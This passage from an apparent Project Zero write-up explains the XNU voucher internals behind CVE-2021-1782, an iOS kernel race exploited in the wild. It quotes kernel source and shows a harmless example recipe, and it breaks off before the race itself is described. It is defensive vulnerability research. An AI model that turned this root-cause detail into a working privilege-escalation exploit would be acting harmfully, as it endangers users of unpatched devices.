  * send them to us), we need to be lenient and accept them.

  * To do so, we need to pretend as if we read all of the

  * bytes that the header said we would find, even though

  * we actually came up short.

  */

Verifying that a rewritten, simpler decoder also handles every hard-coded edge case correctly probably leads to it not being so simple after all.

CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers

By: Anonymous
14 April 2022 at 15:58

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability exploited in the wild and patched in early 2021. Like the writeup published last week looking at an ASN.1 parser bug, this blog post is based on the notes I took as I was analyzing the patch and trying to understand the XNU vouchers subsystem. I hope that this writeup serves as the missing documentation for how some of the internals of the voucher subsystem works and its quirks which lead to this vulnerability.

CVE-2021-1782 was fixed in iOS 14.4, as noted by @s1guza on twitter:

"So iOS 14.4 added locks around this code bit (user_data_get_value() in ipc_voucher.c). "e_made" seems to function as a refcount, and you should be able to race this with itself and cause some refs to get lost, eventually giving you a double free"

This vulnerability was fixed on January 26th 2021, and Apple updated the iOS 14.4 release notes on May 28th 2021 to indicate that the issue may have been actively exploited:

Kernel. Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Impact: A Malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited. Description: A race condition was addressed with improved locking. CVE-2021-1772: an anonymous researcher. Entry updated May 28, 2021

Vouchers

What exactly is a voucher?

The kernel code has a concise description:

Vouchers are a reference counted immutable (once-created) set of indexes to particular resource manager attribute values (which themselves are reference counted).

That definition is technically correct, though perhaps not all that helpful by itself.

To actually understand the root cause and exploitability of this vulnerability is going to require covering a lot of the voucher codebase. This part of XNU is pretty obscure, and pretty complicated.

A voucher is a reference-counted table of keys and values. Pointers to all created vouchers are stored in the global ivht_bucket hash table.

For a particular set of keys and values there should only be one voucher object. During the creation of a voucher there is a deduplication stage where the new voucher is compared against all existing vouchers in the hashtable to ensure they remain unique, returning a reference to the existing voucher if a duplicate has been found.

Here's the structure of a voucher:

struct ipc_voucher {

  iv_index_t     iv_hash;        /* checksum hash */

  iv_index_t     iv_sum;         /* checksum of values */

  os_refcnt_t    iv_refs;        /* reference count */

  iv_index_t     iv_table_size;  /* size of the voucher table */

  iv_index_t     iv_inline_table[IV_ENTRIES_INLINE];

  iv_entry_t     iv_table;       /* table of voucher attr entries */

  ipc_port_t     iv_port;        /* port representing the voucher */

  queue_chain_t  iv_hash_link;   /* link on hash chain */

};

 

#define IV_ENTRIES_INLINE MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN

The voucher codebase is written in a very generic, extensible way, even though its actual use and supported feature set is quite minimal.

Keys

Keys in vouchers are not arbitrary. Keys are indexes into a voucher's iv_table; a value's position in the iv_table table determines what "key" it was stored under. Whilst the vouchers codebase supports the runtime addition of new key types this feature isn't used and there are just a small number of fixed, well-known keys:

#define MACH_VOUCHER_ATTR_KEY_ALL ((mach_voucher_attr_key_t)~0)

#define MACH_VOUCHER_ATTR_KEY_NONE ((mach_voucher_attr_key_t)0)

 

/* other well-known-keys will be added here */

#define MACH_VOUCHER_ATTR_KEY_ATM ((mach_voucher_attr_key_t)1)

#define MACH_VOUCHER_ATTR_KEY_IMPORTANCE ((mach_voucher_attr_key_t)2)

#define MACH_VOUCHER_ATTR_KEY_BANK ((mach_voucher_attr_key_t)3)

#define MACH_VOUCHER_ATTR_KEY_PTHPRIORITY ((mach_voucher_attr_key_t)4)

 

#define MACH_VOUCHER_ATTR_KEY_USER_DATA ((mach_voucher_attr_key_t)7)

 

#define MACH_VOUCHER_ATTR_KEY_TEST ((mach_voucher_attr_key_t)8)

 

#define MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN MACH_VOUCHER_ATTR_KEY_TEST

The iv_inline_table in an ipc_voucher has 8 entries. But of those, only four are actually supported and have any associated functionality. The ATM voucher attributes are deprecated and the code supporting them is gone so only IMPORTANCE (2), BANK (3), PTHPRIORITY (4) and USER_DATA (7) are valid keys. There's some confusion (perhaps on my part) about when exactly you should use the term key and when attribute; I'll use them interchangeably to refer to these key values and the corresponding "types" of values which they manage. More on that later.

Values

Each entry in a voucher iv_table is an iv_index_t:

typedef natural_t iv_index_t;

Each value is again an index; this time into a per-key cache of values, abstracted as a "Voucher Attribute Cache Control Object" represented by this structure:

struct ipc_voucher_attr_control {

os_refcnt_t   ivac_refs;

boolean_t     ivac_is_growing;      /* is the table being grown */

ivac_entry_t  ivac_table;           /* table of voucher attr value entries */

iv_index_t    ivac_table_size;      /* size of the attr value table */

iv_index_t    ivac_init_table_size; /* size of the attr value table */

iv_index_t    ivac_freelist;        /* index of the first free element */

ipc_port_t    ivac_port;            /* port for accessing the cache control  */

lck_spin_t    ivac_lock_data;

iv_index_t    ivac_key_index;       /* key index for this value */

};

These are accessed indirectly via another global table:

static ipc_voucher_global_table_element iv_global_table[MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN];

(Again, the comments in the code indicate that in the future that this table may grow in size and allow attributes to be managed in userspace, but for now it's just a fixed size array.)

Each element in that table has this structure:

typedef struct ipc_voucher_global_table_element {

        ipc_voucher_attr_manager_t      ivgte_manager;

        ipc_voucher_attr_control_t      ivgte_control;

        mach_voucher_attr_key_t         ivgte_key;

} ipc_voucher_global_table_element;

Both the iv_global_table and each voucher's iv_table are indexed by (key-1), not key, so the userdata entry is [6], not [7], even though the array still has 8 entries.

The ipc_voucher_attr_control_t provides an abstract interface for managing "values" and the ipc_voucher_attr_manager_t provides the "type-specific" logic to implement the semantics of each type (here by type I mean "key" or "attr" type.) Let's look more concretely at what that means. Here's the definition of ipc_voucher_attr_manager_t:

struct ipc_voucher_attr_manager {

  ipc_voucher_attr_manager_release_value_t    ivam_release_value;

  ipc_voucher_attr_manager_get_value_t        ivam_get_value;

  ipc_voucher_attr_manager_extract_content_t  ivam_extract_content;

  ipc_voucher_attr_manager_command_t          ivam_command;

  ipc_voucher_attr_manager_release_t          ivam_release;

  ipc_voucher_attr_manager_flags              ivam_flags;

};

ivam_flags is an int containing some flags; the other five fields are function pointers which define the semantics of the particular attr type. Here's the ipc_voucher_attr_manager structure for the user_data type:

const struct ipc_voucher_attr_manager user_data_manager = {

  .ivam_release_value =   user_data_release_value,

  .ivam_get_value =       user_data_get_value,

  .ivam_extract_content = user_data_extract_content,

  .ivam_command =         user_data_command,

  .ivam_release =         user_data_release,

  .ivam_flags =           IVAM_FLAGS_NONE,

};

Those five function pointers are the only interface from the generic voucher code into the type-specific code. The interface may seem simple but there are some tricky subtleties in there; we'll get to that later!

Let's go back to the generic ipc_voucher_attr_control structure which maintains the "values" for each key in a type-agnostic way. The most important field is ivac_entry_t  ivac_table, which is an array of ivac_entry_s's. It's an index into this table which is stored in each voucher's iv_table.

Here's the structure of each entry in that table:

struct ivac_entry_s {

  iv_value_handle_t ivace_value;

  iv_value_refs_t   ivace_layered:1,   /* layered effective entry */

                    ivace_releasing:1, /* release in progress */

                    ivace_free:1,      /* on freelist */

                    ivace_persist:1,   /* Persist the entry, don't

                                           count made refs */

                    ivace_refs:28;     /* reference count */

  union {

    iv_value_refs_t ivaceu_made;       /* made count (non-layered) */

    iv_index_t      ivaceu_layer;      /* next effective layer

                                          (layered) */

  } ivace_u;

  iv_index_t        ivace_next;        /* hash or freelist */

  iv_index_t        ivace_index;       /* hash head (independent) */

};

ivace_refs is a reference count for this table index. Note that this entry is inline in an array; so this reference count going to zero doesn't cause the ivac_entry_s to be free'd back to a kernel allocator (like the zone allocator for example.) Instead, it moves this table index onto a freelist of empty entries. The table can grow but never shrink.

Table entries which aren't free store a type-specific "handle" in ivace_value. Here's the typedef chain for that type:

iv_value_handle_t ivace_value

typedef mach_voucher_attr_value_handle_t iv_value_handle_t;

typedef uint64_t mach_voucher_attr_value_handle_t;

The handle is a uint64_t but in reality the attrs can (and do) store pointers there, hidden behind casts.

A guarantee made by the attr_control is that there will only ever be one (live) ivac_entry_s for a particular ivace_value. This means that each time a new ivace_value needs an ivac_entry the attr_control's ivac_table needs to be searched to see if a matching value is already present. To speed this up in-use ivac_entries are linked together in hash buckets so that a (hopefully significantly) shorter linked-list of entries can be searched rather than a linear scan of the whole table. (Note that it's not a linked-list of pointers; each link in the chain is an index into the table.)

Userdata attrs

user_data is one of the four types of supported, implemented voucher attr types. It's only purpose is to manage buffers of arbitrary, user controlled data. Since the attr_control performs deduping only on the ivace_value (which is a pointer) the userdata attr manager is responsible for ensuring that userdata values which have identical buffer values (matching length and bytes) have identical pointers.

To do this it maintains a hash table of user_data_value_element structures, which wrap a variable-sized buffer of bytes:

struct user_data_value_element {

  mach_voucher_attr_value_reference_t e_made;

  mach_voucher_attr_content_size_t    e_size;

  iv_index_t                          e_sum;

  iv_index_t                          e_hash;

  queue_chain_t                       e_hash_link;

  uint8_t                             e_data[];

};

Each inline e_data buffer can be up to 16KB. e_hash_link stores the hash-table bucket list pointer.

e_made is not a simple reference count. Looking through the code you'll notice that there are no places where it's ever decremented. Since there should (nearly) always be a 1:1 mapping between an ivace_entry and a user_data_value_element this structure shouldn't need to be reference counted. There is however one very fiddly race condition (which isn't the race condition which causes the vulnerability!) which necessitates the e_made field. This race condition is sort-of documented and we'll get there eventually...

Recipes

The host_create_mach_voucher host port MIG (Mach Interface Generator) method is the userspace interface for creating vouchers:

kern_return_t

host_create_mach_voucher(mach_port_name_t host,

    mach_voucher_attr_raw_recipe_array_t recipes,

    mach_voucher_attr_recipe_size_t recipesCnt,

    mach_port_name_t *voucher);

recipes points to a buffer filled with a sequence of packed variable-size mach_voucher_attr_recipe_data structures:

typedef struct mach_voucher_attr_recipe_data {

  mach_voucher_attr_key_t            key;

  mach_voucher_attr_recipe_command_t command;

  mach_voucher_name_t                previous_voucher;

  mach_voucher_attr_content_size_t   content_size;

  uint8_t                            content[];

} mach_voucher_attr_recipe_data_t;

key is one of the four supported voucher attr types we've seen before (importance, bank, pthread_priority and user_data) or a wildcard value (MACH_VOUCHER_ATTR_KEY_ALL) indicating that the command should apply to all keys. There are a number of generic commands as well as type-specific commands. Commands can optionally refer to existing vouchers via the previous_voucher field, which should name a voucher port.

Here are the supported generic commands for voucher creation:

MACH_VOUCHER_ATTR_COPY: copy the attr value from the previous voucher. You can specify the wildcard key to copy all the attr values from the previous voucher.

MACH_VOUCHER_ATTR_REMOVE: remove the specified attr value from the voucher under construction. This can also remove all the attributes from the voucher under construction (which, arguably, makes no sense.)

MACH_VOUCHER_ATTR_SET_VALUE_HANDLE: this command is only valid for kernel clients; it allows the caller to specify an arbitrary ivace_value, which doesn't make sense for userspace and shouldn't be reachable.

MACH_VOUCHER_ATTR_REDEEM: the semantics of redeeming an attribute from a previous voucher are not defined by the voucher code; it's up to the individual managers to determine what that might mean.

Here are the attr-specific commands for voucher creation for each type:

bank:

MACH_VOUCHER_ATTR_BANK_CREATE

MACH_VOUCHER_ATTR_BANK_MODIFY_PERSONA

MACH_VOUCHER_ATTR_AUTO_REDEEM

MACH_VOUCHER_ATTR_SEND_PREPROCESS

importance:

MACH_VOUCHER_ATTR_IMPORTANCE_SELF

user_data:

MACH_VOUCHER_ATTR_USER_DATA_STORE

pthread_priority:

MACH_VOUCHER_ATTR_PTHPRIORITY_CREATE

Note that there are further commands which can be "executed against" vouchers via the mach_voucher_attr_command MIG method which calls the attr manager's        ivam_command function pointer. Those are:

bank:

BANK_ORIGINATOR_PID

BANK_PERSONA_TOKEN

BANK_PERSONA_ID

importance:

MACH_VOUCHER_IMPORTANCE_ATTR_DROP_EXTERNAL

user_data:

none

pthread_priority:

none

Let's look at example recipe for creating a voucher with a single user_data attr, consisting of the 4 bytes {0x41, 0x41, 0x41, 0x41}:

struct udata_dword_recipe {

  mach_voucher_attr_recipe_data_t recipe;

  uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

Let's follow the path of this recipe in detail.

Here's the most important part of host_create_mach_voucher showing the three high-level phases: voucher allocation, attribute creation and voucher de-duping. It's not the responsibility of this code to find or allocate a mach port for the voucher; that's done by the MIG layer code.

/* allocate new voucher */

voucher = iv_alloc(ivgt_keys_in_use);

if (IV_NULL == voucher) {

  return KERN_RESOURCE_SHORTAGE;

}

 /* iterate over the recipe items */

while (0 < recipe_size - recipe_used) {

  ipc_voucher_t prev_iv;

  if (recipe_size - recipe_used < sizeof(*sub_recipe)) {

    kr = KERN_INVALID_ARGUMENT;

    break;

  }

  /* find the next recipe */

  sub_recipe =

    (mach_voucher_attr_recipe_t)(void *)&recipes[recipe_used];

  if (recipe_size - recipe_used - sizeof(*sub_recipe) <

      sub_recipe->content_size) {

    kr = KERN_INVALID_ARGUMENT;

    break;

  }

  recipe_used += sizeof(*sub_recipe) + sub_recipe->content_size;

  /* convert voucher port name (current space) */

  /* into a voucher reference */

  prev_iv =

    convert_port_name_to_voucher(sub_recipe->previous_voucher);

  if (MACH_PORT_NULL != sub_recipe->previous_voucher &&

      IV_NULL == prev_iv) {

    kr = KERN_INVALID_CAPABILITY;

    break;

  }

  kr = ipc_execute_voucher_recipe_command(

         voucher,

         sub_recipe->key,

         sub_recipe->command,

         prev_iv,

         sub_recipe->content,

         sub_recipe->content_size,

         FALSE);

  ipc_voucher_release(prev_iv);

  if (KERN_SUCCESS != kr) {

    break;

  }

}

if (KERN_SUCCESS == kr) {

  *new_voucher = iv_dedup(voucher);

} else {

  *new_voucher = IV_NULL;

  iv_dealloc(voucher, FALSE);

}

At the top of this snippet a new voucher is allocated in iv_alloc. ipc_execute_voucher_recipe_command is then called in a loop to consume however many sub-recipe structures were provided by userspace. Each sub-recipe can optionally refer to an existing voucher via the sub-recipe previous_voucher field. Note that MIG doesn't natively support variable-sized structures containing ports so it's passed as a mach port name which is looked up in the calling task's mach port namespace and converted to a voucher reference by convert_port_name_to_voucher. The intended functionality here is to be able to refer to attrs in other vouchers to copy or "redeem" them. As discussed, the semantics of redeeming a voucher attr isn't defined by the abstract voucher code and it's up to the individual attr managers to decide what that means.

Once the entire recipe has been consumed and all the iv_table entries filled in, iv_dedup then searches the ivht_bucket hash table to see if there's an existing voucher with a matching set of attributes. Remember that each attribute value stored in a voucher is an index into the attribute controller's attribute table; and those attributes are unique, so it suffices to simply compare the array of voucher indexes to determine whether all attribute values are equal. If a matching voucher is found, iv_dedup returns a reference to the existing voucher and calls iv_dealloc to free the newly created newly-created voucher. Otherwise, if no existing, matching voucher is found, iv_dedup adds the newly created voucher to the ivht_bucket hash table.

Let's look at ipc_execute_voucher_recipe_command which is responsible for filling in the requested entries in the voucher iv_table. Note that key and command are arbitrary, controlled dwords. content is a pointer to a buffer of controlled bytes, and content_size is the correct size of that input buffer. The MIG layer limits the overall input size of the recipe (which is a collection of sub-recipes) to 5260 bytes, and any input content buffers would have to fit in there.

static kern_return_t

ipc_execute_voucher_recipe_command(

  ipc_voucher_t                      voucher,

  mach_voucher_attr_key_t            key,

  mach_voucher_attr_recipe_command_t command,

  ipc_voucher_t                      prev_iv,

  mach_voucher_attr_content_t        content,

  mach_voucher_attr_content_size_t   content_size,

  boolean_t                          key_priv)

{

  iv_index_t prev_val_index;

  iv_index_t val_index;

  kern_return_t kr;

  switch (command) {

MACH_VOUCHER_ATTR_USER_DATA_STORE isn't one of the switch statement case values here so the code falls through to the default case:

        default:

                kr = ipc_replace_voucher_value(voucher,

                    key,

                    command,

                    prev_iv,

                    content,

                    content_size);

                if (KERN_SUCCESS != kr) {

                        return kr;

                }

                break;

        }

        return KERN_SUCCESS;

Here's that code:

static kern_return_t

ipc_replace_voucher_value(

        ipc_voucher_t                           voucher,

        mach_voucher_attr_key_t                 key,

        mach_voucher_attr_recipe_command_t      command,

        ipc_voucher_t                           prev_voucher,

        mach_voucher_attr_content_t             content,

        mach_voucher_attr_content_size_t        content_size)

{

...

        /*

         * Get the manager for this key_index.

         * Returns a reference on the control.

         */

        key_index = iv_key_to_index(key);

        ivgt_lookup(key_index, TRUE, &ivam, &ivac);

        if (IVAM_NULL == ivam) {

                return KERN_INVALID_ARGUMENT;

        }

..

iv_key_to_index just subtracts 1 from key (assuming it's valid and not MACH_VOUCHER_ATRR_KEY_ALL):

static inline iv_index_t

iv_key_to_index(mach_voucher_attr_key_t key)

{

        if (MACH_VOUCHER_ATTR_KEY_ALL == key ||

            MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN < key) {

                return IV_UNUSED_KEYINDEX;

        }

        return (iv_index_t)key - 1;

}

ivgt_lookup then gets a reference on that key's attr manager and attr controller. The manager is really just a bunch of function pointers which define the semantics of what different "key types" actually mean; and the controller stores (and caches) values for those keys.

Let's keep reading ipc_replace_voucher_value. Here's the next statement:

        /* save the current value stored in the forming voucher */

        save_val_index = iv_lookup(voucher, key_index);

This point is important for getting a good feeling for how the voucher code is supposed to work; recipes can refer not only to other vouchers (via the previous_voucher port) but they can also refer to themselves during creation. You don't have to have just one sub-recipe per attr type for which you wish to have a value in your voucher; you can specify multiple sub-recipes for that type. Does it actually make any sense to do that? Well, luckily for the security researcher we don't have to worry about whether functionality actually makes any sense; it's all just a weird machine to us! (There's allusions in the code to future functionality where attribute values can be "layered" or "linked" but for now such functionality doesn't exist.)

iv_lookup returns the "value index" for the given key in the particular voucher. That means it just returns the iv_index_t in the iv_table of the given voucher:

static inline iv_index_t

iv_lookup(ipc_voucher_t iv, iv_index_t key_index)

{

        if (key_index < iv->iv_table_size) {

                return iv->iv_table[key_index];

        }

        return IV_UNUSED_VALINDEX;

}

This value index uniquely identifies an existing attribute value, but you need to ask the attribute's controller for the actual value. Before getting that previous value though, the code first determines whether this sub-recipe might be trying to refer to the value currently stored by this voucher or has explicitly passed in a previous_voucher. The value in the previous voucher takes precedence over whatever is already in the under-construction voucher.

        prev_val_index = (IV_NULL != prev_voucher) ?

            iv_lookup(prev_voucher, key_index) :

            save_val_index;

Then the code looks up the actual previous value to operate on:

        ivace_lookup_values(key_index, prev_val_index,

            previous_vals, &previous_vals_count);

key_index is the key we're operating on, MACH_VOUCHER_ATTR_KEY_USER_DATA in this example. This function is called ivace_lookup_values (note the plural). There are some comments in the voucher code indicating that maybe in the future values could themselves be put into a linked-list such that you could have larger values (or layered/chained values.) But this functionality isn't implemented; ivace_lookup_values will only ever return 1 value.

Here's ivace_lookup_values:

static void

ivace_lookup_values(

        iv_index_t                              key_index,

        iv_index_t                              value_index,

        mach_voucher_attr_value_handle_array_t          values,

        mach_voucher_attr_value_handle_array_size_t     *count)

{

        ipc_voucher_attr_control_t ivac;

        ivac_entry_t ivace;

        if (IV_UNUSED_VALINDEX == value_index ||

            MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN <= key_index) {

                *count = 0;

                return;

        }

        ivac = iv_global_table[key_index].ivgte_control;

        assert(IVAC_NULL != ivac);

        /*

         * Get the entry and then the linked values.

         */

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        /*

         * TODO: support chained values (for effective vouchers).

         */

        assert(ivace->ivace_refs > 0);

        values[0] = ivace->ivace_value;

        ivac_unlock(ivac);

        *count = 1;

}

The locking used in the vouchers code is very important for properly understanding the underlying vulnerability when we eventually get there, but for now I'm glossing over it and we'll return to examine the relevant locks when necessary.

Let's discuss the ivace_lookup_values code. They index the iv_global_table to get a pointer to the attribute type's controller:

        ivac = iv_global_table[key_index].ivgte_control;

They take that controller's lock then index its ivac_table to find that value's struct ivac_entry_s and read the ivace_value value from there:

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        assert(ivace->ivace_refs > 0);

        values[0] = ivace->ivace_value;

        ivac_unlock(ivac);

        *count = 1;

Let's go back to the calling function (ipc_replace_voucher_value) and keep reading:

        /* Call out to resource manager to get new value */

        new_value_voucher = IV_NULL;

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

ivam->ivam_get_value is calling the attribute type's function pointer which defines the meaning for the particular type of "get_value". The term get_value here is a little confusing; aren't we trying to store a new value? (and there's no subsequent call to a method like "store_value".) A better way to think about the semantics of get_value is that it's meant to evaluate both previous_vals (either the value from previous_voucher or the value currently in this voucher) and content (the arbitrary byte buffer from this sub-recipe) and combine/evaluate them to create a value representation. It's then up to the controller layer to store/cache that value. (Actually there's one tedious snag in this system which we'll get to involving locking...)

ivam_get_value for the user_data attribute type is user_data_get_value:

static kern_return_t

user_data_get_value(

        ipc_voucher_attr_manager_t                      __assert_only manager,

        mach_voucher_attr_key_t                         __assert_only key,

        mach_voucher_attr_recipe_command_t              command,

        mach_voucher_attr_value_handle_array_t          prev_values,

        mach_voucher_attr_value_handle_array_size_t     prev_value_count,

        mach_voucher_attr_content_t                     content,

        mach_voucher_attr_content_size_t                content_size,

        mach_voucher_attr_value_handle_t                *out_value,

        mach_voucher_attr_value_flags_t                 *out_flags,

        ipc_voucher_t                                   *out_value_voucher)

{

        user_data_element_t elem;

        assert(&user_data_manager == manager);

        USER_DATA_ASSERT_KEY(key);

        /* never an out voucher */

        *out_value_voucher = IPC_VOUCHER_NULL;

        *out_flags = MACH_VOUCHER_ATTR_VALUE_FLAGS_NONE;

        switch (command) {

        case MACH_VOUCHER_ATTR_REDEEM:

                /* redeem of previous values is the value */

                if (0 < prev_value_count) {

                        elem = (user_data_element_t)prev_values[0];

                        assert(0 < elem->e_made);

                        elem->e_made++;

                        *out_value = prev_values[0];

                        return KERN_SUCCESS;

                }

                /* redeem of default is default */

                *out_value = 0;

                return KERN_SUCCESS;

        case MACH_VOUCHER_ATTR_USER_DATA_STORE:

                if (USER_DATA_MAX_DATA < content_size) {

                        return KERN_RESOURCE_SHORTAGE;

                }

                /* empty is the default */

                if (0 == content_size) {

                        *out_value = 0;

                        return KERN_SUCCESS;

                }

                elem = user_data_dedup(content, content_size);

                *out_value = (mach_voucher_attr_value_handle_t)elem;

                return KERN_SUCCESS;

        default:

                /* every other command is unknown */

                return KERN_INVALID_ARGUMENT;

        }

}

Let's look at the MACH_VOUCHER_ATTR_USER_DATA_STORE case, which is the command we put in our single sub-recipe. (The vulnerability is in the MACH_VOUCHER_ATTR_REDEEM code above but we need a lot more background before we get to that.) In the MACH_VOUCHER_ATTR_USER_DATA_STORE case the input arbitrary byte buffer is passed to user_data_dedup, then that return value is returned as the value of out_value. Here's user_data_dedup:

static user_data_element_t

user_data_dedup(

        mach_voucher_attr_content_t                     content,

        mach_voucher_attr_content_size_t                content_size)

{

        iv_index_t sum;

        iv_index_t hash;

        user_data_element_t elem;

        user_data_element_t alloc = NULL;

        sum = user_data_checksum(content, content_size);

        hash = USER_DATA_HASH_BUCKET(sum);

retry:

        user_data_lock();

        queue_iterate(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link) {

                assert(elem->e_hash == hash);

                /* if sums match... */

                if (elem->e_sum == sum && elem->e_size == content_size) {

                        iv_index_t i;

                        /* and all data matches */

                        for (i = 0; i < content_size; i++) {

                                if (elem->e_data[i] != content[i]) {

                                        break;

                                }

                        }

                        if (i < content_size) {

                                continue;

                        }

                        /* ... we found a match... */

                        elem->e_made++;

                        user_data_unlock();

                        if (NULL != alloc) {

                                kfree(alloc, sizeof(*alloc) + content_size);

                        }

                        return elem;

                }

        }

        if (NULL == alloc) {

                user_data_unlock();

                alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size);

                alloc->e_made = 1;

                alloc->e_size = content_size;

                alloc->e_sum = sum;

                alloc->e_hash = hash;

                memcpy(alloc->e_data, content, content_size);

                goto retry;

        }

        queue_enter(&user_data_bucket[hash], alloc, user_data_element_t, e_hash_link);

        user_data_unlock();

        return alloc;

}

The user_data attributes are just uniquified buffer pointers. Each buffer is represented by a user_data_value_element structure, which has a meta-data header followed by a variable-sized inline buffer containing the arbitrary byte data:

struct user_data_value_element {

        mach_voucher_attr_value_reference_t     e_made;

        mach_voucher_attr_content_size_t        e_size;

        iv_index_t                              e_sum;

        iv_index_t                              e_hash;

        queue_chain_t                           e_hash_link;

        uint8_t                                 e_data[];

};

Pointers to those elements are stored in the user_data_bucket hash table.

user_data_dedup searches the user_data_bucket hash table to see if a matching user_data_value_element already exists. If not, it allocates one and adds it to the hash table. Note that it's not allowed to hold locks while calling kalloc() so the code first has to drop the user_data lock, allocate a user_data_value_element then take the lock again and check the hash table a second time to ensure that another thread didn't also allocate and insert a matching user_data_value_element while the lock was dropped.

The e_made field of user_data_value_element is critical to the vulnerability we're eventually going to discuss, so let's examine its use here.

If a new user_data_value_element is created its e_made field is initialized to 1. If an existing user_data_value_element is found which matches the requested content buffer the e_made field is incremented before a pointer to that user_data_value_element is returned. Redeeming a user_data_value_element (via the MACH_VOUCHER_ATTR_REDEEM command) also just increments the e_made of the element being redeemed before returning it. The type of the e_made field is mach_voucher_attr_value_reference_t so it's tempting to believe that this field is a reference count. The reality is more subtle than that though.

The first hint that e_made isn't exactly a reference count is that if you search for e_made in XNU you'll notice that it's never decremented. There are also no places where a pointer to that structure is cast to another type which treats the first dword as a reference count. e_made can only ever go up (well technically there's also nothing stopping it overflowing so it can also go down 1 in every 232 increments...)

Let's go back up the stack to the caller of user_data_get_value, ipc_replace_voucher_value:

The next part is again code for unused functionality. No current voucher attr type implementations return a new_value_voucher so this condition is never true:

        /* TODO: value insertion from returned voucher */

        if (IV_NULL != new_value_voucher) {

                iv_release(new_value_voucher);

        }

Next, the code needs to wrap new_value in an ivace_entry and determine the index of that ivace_entry in the controller's table of values. This is done by ivace_reference_by_value:

        /*

         * Find or create a slot in the table associated

         * with this attribute value.  The ivac reference

         * is transferred to a new value, or consumed if

         * we find a matching existing value.

         */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

        iv_set(voucher, key_index, val_index);

/*

 * Look up the values for a given <key, index> pair.

 *

 * Consumes a reference on the passed voucher control.

 * Either it is donated to a newly-created value cache

 * or it is released (if we piggy back on an existing

 * value cache entry).

 */

static iv_index_t

ivace_reference_by_value(

        ipc_voucher_attr_control_t      ivac,

        mach_voucher_attr_value_handle_t        value,

        mach_voucher_attr_value_flags_t          flag)

{

        ivac_entry_t ivace = IVACE_NULL;

        iv_index_t hash_index;

        iv_index_t index;

        if (IVAC_NULL == ivac) {

                return IV_UNUSED_VALINDEX;

        }

        ivac_lock(ivac);

restart:

        hash_index = IV_HASH_VAL(ivac->ivac_init_table_size, value);

        index = ivac->ivac_table[hash_index].ivace_index;

        while (index != IV_HASH_END) {

                assert(index < ivac->ivac_table_size);

                ivace = &ivac->ivac_table[index];

                assert(!ivace->ivace_free);

                if (ivace->ivace_value == value) {

                        break;

                }

                assert(ivace->ivace_next != index);

                index = ivace->ivace_next;

        }

        /* found it? */

        if (index != IV_HASH_END) {

                /* only add reference on non-persistent value */

                if (!ivace->ivace_persist) {

                        ivace->ivace_refs++;

                        ivace->ivace_made++;

                }

                ivac_unlock(ivac);

                ivac_release(ivac);

                return index;

        }

        /* insert new entry in the table */

        index = ivac->ivac_freelist;

        if (IV_FREELIST_END == index) {

                /* freelist empty */

                ivac_grow_table(ivac);

                goto restart;

        }

        /* take the entry off the freelist */

        ivace = &ivac->ivac_table[index];

        ivac->ivac_freelist = ivace->ivace_next;

        /* initialize the new entry */

        ivace->ivace_value = value;

        ivace->ivace_refs = 1;

        ivace->ivace_made = 1;

        ivace->ivace_free = FALSE;

        ivace->ivace_persist = (flag & MACH_VOUCHER_ATTR_VALUE_FLAGS_PERSIST) ? TRUE : FALSE;

        /* insert the new entry in the proper hash chain */

        ivace->ivace_next = ivac->ivac_table[hash_index].ivace_index;

        ivac->ivac_table[hash_index].ivace_index = index;

        ivac_unlock(ivac);

        /* donated passed in ivac reference to new entry */

        return index;

}

You'll notice that this code has a very similar structure to user_data_dedup; it needs to do almost exactly the same thing. Under a lock (this time the controller's lock) traverse a hash table looking for a matching value. If one can't be found, allocate a new entry and put the value in the hash table. The same unlock/lock dance is needed, but not every time because ivace's are kept in a table of struct ivac_entry_s's so the lock only needs to be dropped if the table needs to grow.

If a new entry is allocated (from the freelist of ivac_entry's in the table) then its reference count (ivace_refs) is set to 1, and its ivace_made count is set to 1. If an existing entry is found then both its ivace_refs and ivace_made counts are incremented:

                        ivace->ivace_refs++;

                        ivace->ivace_made++;

Finally, the index of this entry in the table of all the controller's entries is returned, because it's the index into that table which a voucher stores; not a pointer to the ivace.

ivace_reference_by_value then calls iv_set to store that index into the correct slot in the voucher's iv_table, which is just a simple array index operation:

        iv_set(voucher, key_index, val_index);

static void

iv_set(ipc_voucher_t iv,

    iv_index_t key_index,

    iv_index_t value_index)

{

        assert(key_index < iv->iv_table_size);

        iv->iv_table[key_index] = value_index;

}

Our journey following this recipe is almost over! Since we only supplied one sub-recipe we exit the loop in host_create_mach_voucher and reach the call to iv_dedup:

        if (KERN_SUCCESS == kr) {

                *new_voucher = iv_dedup(voucher);

I won't show the code for iv_dedup here because it's again structurally almost identical to the two other levels of deduping we've examined. In fact it's a little simpler because it can hold the associated hash table lock the whole time (via ivht_lock()) since it doesn't need to allocate anything. If a match is found (that is, the hash table already contains a voucher with exactly the same set of value indexes) then a reference is taken on that existing voucher and a reference is dropped on the voucher we just created from the input recipe via iv_dealloc:

iv_dealloc(new_iv, FALSE);

The FALSE argument here indicates that new_iv isn't in the ivht_bucket hashtable so shouldn't be removed from there if it is going to be destroyed. Vouchers are only added to the hashtable after the deduping process to prevent deduplication happening against incomplete vouchers.

